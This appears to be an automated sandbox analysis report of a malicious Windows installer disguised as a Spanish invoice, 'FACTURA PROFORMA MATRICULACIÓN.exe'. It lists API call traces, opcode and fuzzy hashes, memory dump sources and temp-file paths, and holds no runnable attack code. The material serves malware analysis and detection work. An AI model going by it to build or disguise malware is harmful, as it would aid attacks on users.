                                                  • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                  • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                  • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16D5
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16DC
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,707E22D8,?,00000808), ref: 707E16F0
                                                  • GetProcAddress.KERNEL32(707E22D8,00000000), ref: 707E16F7
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E1700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_707e0000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: c24e82d92fb72a85e1879621096f5851c7504e77c7c5692690f5445a7f4cde15
                                                  • Instruction ID: 86eee06e6f54e024c68ddd5790ccae024c896364b1181fc1a603d7c2ee68c25a
                                                  • Opcode Fuzzy Hash: c24e82d92fb72a85e1879621096f5851c7504e77c7c5692690f5445a7f4cde15
                                                  • Instruction Fuzzy Hash: 0AF05E331071397BC62016A78C4CD9B7F9CDF8B2F5B110261F318911A085614C0187F5
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                  • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                  • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                  • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                  APIs
                                                  • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                  • wsprintfW.USER32 ref: 00404E17
                                                  • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                  • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                  • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                  • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                  APIs
                                                    • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,Baboodom111 Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405ECE
                                                    • Part of subcall function 00405EBB: CharNextW.USER32(00000000), ref: 00405EE6
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405F71
                                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\), ref: 00405F81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 3248276644-2153932574
                                                  • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                  • Instruction ID: 8289fae0aeb6f8c8bb33a18b648b52325edb3dacd4d1dfbf908f72671121fed4
                                                  • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                  • Instruction Fuzzy Hash: 5EF0F435115E6326E722373A5C49AAF1A04CEC6324B59053BF8A5B22C1DF3C8D5389BE
                                                  APIs
                                                  • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,?,00405F2F,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,C:\Users\user\AppData\Local\Temp\nskBC9B.tmp,77943420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,77943420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"), ref: 00405EC9
                                                  • CharNextW.USER32(00000000), ref: 00405ECE
                                                  • CharNextW.USER32(00000000), ref: 00405EE6
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nskBC9B.tmp, xrefs: 00405EBC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp
                                                  • API String ID: 3213498283-3152796830
                                                  • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                  • Instruction ID: c2ae64a9e281e0169ab0b3f813724322829f62ec5c7d6721859fffd7401bb401
                                                  • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                  • Instruction Fuzzy Hash: 3AF0F631920A1296DB31B7548C58E7752BCEB94350B00843BD281B32C1D7FC49C18EED
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,77943420,00000000,C:\Users\user\AppData\Local\Temp\,00403B56,00403A6C,?,?,00000008,0000000A,0000000C), ref: 00403B98
                                                  • GlobalFree.KERNEL32(005A2930), ref: 00403B9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: 0)Z$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-2264644079
                                                  • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                  • Instruction ID: 6342289a3e1e3ca18c24491f6708bfd4349b13536718f8c5743bc800c8661b5d
                                                  • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                  • Instruction Fuzzy Hash: FBE08C329015205BC6211F19ED04B1A77B86F45B27F06402AE8807B26287B82C838FD8
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E16
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403509,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405E20
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E32
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction ID: 6241345b1480893618f3385b5901a002ffa6f457481071e3b6de6f74fd74f6f8
                                                  • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                  • Instruction Fuzzy Hash: 00D05E71101634AAC2117B48AC08CDF62AC9E46344341402AF141B20A5C7785A5186ED
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 707E1171
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 707E11E3
                                                  • GlobalFree.KERNEL32 ref: 707E124A
                                                  • GlobalFree.KERNEL32(?), ref: 707E129B
                                                  • GlobalFree.KERNEL32(00000000), ref: 707E12B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84226363291.00000000707E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 707E0000, based on PE: true
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 2ca2ee5751d2231c66c52cf6aee1c1dbc79bf5245e7db97294e4f9a66282cbd9
                                                  • Instruction ID: 304e389d326d32283102db16ef18834793e94003457e41f887778290bea29125
                                                  • Opcode Fuzzy Hash: 2ca2ee5751d2231c66c52cf6aee1c1dbc79bf5245e7db97294e4f9a66282cbd9
                                                  • Instruction Fuzzy Hash: 1A516E7660220ADFD701DF7ACD8AA2977B8FB04315B6045A9FA46DB320E774ED00CB54
                                                  APIs
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll), ref: 004026BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp$C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dll
                                                  • API String ID: 1659193697-1861086917
                                                  • Opcode ID: 581e924386a125687160958282dd6cfcb583c7f50f83c58c9207917b094514fd
                                                  • Instruction ID: a3276bd60f4d5d6bb2aa79b2f1cf5674750ecc9aad51c5d7eefbc562b3e224a1
                                                  • Opcode Fuzzy Hash: 581e924386a125687160958282dd6cfcb583c7f50f83c58c9207917b094514fd
                                                  • Instruction Fuzzy Hash: 7B112B71A10211BBCB00BBB19E469AE3B61AF50348F20443FF402B61C1DAFD8851631E
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040321C,?), ref: 00403051
                                                  • GetTickCount.KERNEL32 ref: 0040306F
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                  • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                  • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                  • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                  • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405569
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                    • Part of subcall function 0040450C: SendMessageW.USER32(00010430,00000000,00000000,00000000), ref: 0040451E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                  • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                  • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                  • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00405E62
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe,80000000,00000003), ref: 00405E72
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction ID: b9e9e75b8ba1df67f9f167ecd7c14c3df7ff164ad8267efb590a8552da577330
                                                  • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                  • Instruction Fuzzy Hash: 81D0A7B3400930DAC3127718EC04D9F77ACEF1634074A443AE580B7165D7785D8186EC
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                  • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.84198539372.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.84198496076.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198579933.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198632331.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.84198891896.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                  • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 70948 36772a80 LdrInitializeThunk

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 367734e0-367734ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 61990b1e7f2d324cba8fc18a684e142c0ca24dbbadf34f784ce7af880f6c4918
                                                  • Instruction ID: 8fae334297558b894a13566fbe97d9cfccfc16b2e82420e65b52288fb08df7f8
                                                  • Opcode Fuzzy Hash: 61990b1e7f2d324cba8fc18a684e142c0ca24dbbadf34f784ce7af880f6c4918
                                                  • Instruction Fuzzy Hash: 9490023161510442D50062594615706100547D0201FA1C916A1418928DC7A58D55B5A3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 36772eb0-36772ebc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a24d7f51c236e1546005d664238948e8aa65f7a1d9e896224f0db896ec628495
                                                  • Instruction ID: 2fedd02e1e4ae4b0a9416b14a4138d28b3046d8eaf23c97c8db8b87b1c1bbfdf
                                                  • Opcode Fuzzy Hash: a24d7f51c236e1546005d664238948e8aa65f7a1d9e896224f0db896ec628495
                                                  • Instruction Fuzzy Hash: D390023121140442D5006259491570B000547D0302F91C516A2158915DC6358C55B572

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 36772d10-36772d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 70faf632732ae26bcd0aa52a1c1672aedd8c797cd5a716103dbe8cae6b40ea6e
                                                  • Instruction ID: f0e0c9cc5c69cb8a0e9d2cef0618824ab443e30cfcf81789498273c285554d74
                                                  • Opcode Fuzzy Hash: 70faf632732ae26bcd0aa52a1c1672aedd8c797cd5a716103dbe8cae6b40ea6e
                                                  • Instruction Fuzzy Hash: 8590023121100453D51162594605707000947D0241FD1C917A1418918DD6668D56F122

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 36772a80-36772a8c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51a725313ffc307ffedf0924e726350309383faa150522c690f8465044f0d730
                                                  • Instruction ID: 975658ffab539483c9003e62558f3a010998080e2ade6f596ce801a3f0b0b75e
                                                  • Opcode Fuzzy Hash: 51a725313ffc307ffedf0924e726350309383faa150522c690f8465044f0d730
                                                  • Instruction Fuzzy Hash: FB90026121200043450572594515616400A47E0201B91C526E2008950DC5358C95B126

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 36772bc0-36772bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 84332e8e1ef124de4907b0f12ca3ef309e5ebc0d58ccf69b5bdc4c8b8880b92d
                                                  • Instruction ID: 3578ce74d755f48ae0f1b3a0259a4afb43324cf02019cee3f0509c25c880f83e
                                                  • Opcode Fuzzy Hash: 84332e8e1ef124de4907b0f12ca3ef309e5ebc0d58ccf69b5bdc4c8b8880b92d
                                                  • Instruction Fuzzy Hash: F790023121100442D50066995509646000547E0301F91D516A6018915EC6758C95B132

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 36772b90-36772b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a603fcc1b0f47600289c255d1055fd933ea34b1d4f7d96e1ca2de3d9982236a
                                                  • Instruction ID: 408ba9d234a1d6c03fec6c098ba136baf85af223bf83007b19575f95eb6b86b4
                                                  • Opcode Fuzzy Hash: 5a603fcc1b0f47600289c255d1055fd933ea34b1d4f7d96e1ca2de3d9982236a
                                                  • Instruction Fuzzy Hash: F890023121108842D5106259850574A000547D0301F95C916A5418A18DC6A58C95B122

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: c59362be31849d85e81505df1e23b3d884bd650e7c878afa57069f3dc5fcb297
                                                  • Instruction ID: f811b6bc50cb110fa9c73bb150a42cd2271b420c4cfb34a19287898980705d76
                                                  • Opcode Fuzzy Hash: c59362be31849d85e81505df1e23b3d884bd650e7c878afa57069f3dc5fcb297
                                                  • Instruction Fuzzy Hash: CA3246B1A083819FE350CF69C884B5BBBE5BF88744F804D2EF5998B250D775E948CB52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  • Address of the debug info found in the active list., xrefs: 367A52B9, 367A5305
                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 367A534E
                                                  • Critical section address, xrefs: 367A5230, 367A52C7, 367A533F
                                                  • double initialized or corrupted critical section, xrefs: 367A5313
                                                  • Critical section address., xrefs: 367A530D
                                                  • Invalid debug info address of this critical section, xrefs: 367A52C1
                                                  • undeleted critical section in freed memory, xrefs: 367A5236
                                                  • corrupted critical section, xrefs: 367A52CD
                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A52ED
                                                  • Thread identifier, xrefs: 367A5345
                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A5215, 367A52A1, 367A5324
                                                  • Critical section debug info address, xrefs: 367A522A, 367A5339
                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 367A52D9
                                                  • 8, xrefs: 367A50EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
